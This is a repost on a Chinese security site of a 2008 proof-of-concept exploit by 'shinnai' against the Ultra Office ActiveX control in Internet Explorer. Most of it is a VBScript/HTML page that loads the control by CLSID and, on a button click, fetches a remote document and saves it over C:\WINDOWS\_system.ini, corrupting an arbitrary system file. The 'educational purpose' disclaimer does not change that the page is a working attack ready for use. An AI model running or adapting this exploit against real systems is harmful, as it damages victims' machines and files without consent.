Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

来源：http://shinnai.altervista.org 作者：shinnai 发布时间：2008-08-28

-----------------------------------------------------------------------------
Ultra Office ActiveX Control Remote Arbitrary File Corruption
url: http://www.ultrashareware.com

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.

Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<object classid='clsid:00989888-BB72-4e31-A7C6-5F819C24D2F7' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
Sub tryMe
   dim remURL
   remURL = "http://SomeSite.com/SomeFile.doc"
   test.Open remURL, True
   test.Save "C:\WINDOWS\_system.ini", True
End Sub
</script>

[

收藏] [

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

用户名：（新注册）密码：匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·3ctftpsvc Buffer Overflow (Lon
·Internet Explorer 6.0 SP2 File
·动网上传漏洞利用工具Ｇui版（De
·VMware 5.5.1 COM Object Arbitr
·Guestbara <= 1.2 Change Admin
·Internet Explorer Version 6.0.
·The IIS Worker Process (w3wp)
·SPIDynamics WebInspect Cross-A
·phpwind 5.x exploits
·serv-u本地权限提升工具|
·Macromedia Flash Player Flash.
·Xforum 1.4 (topic) Remote SQL

推荐广告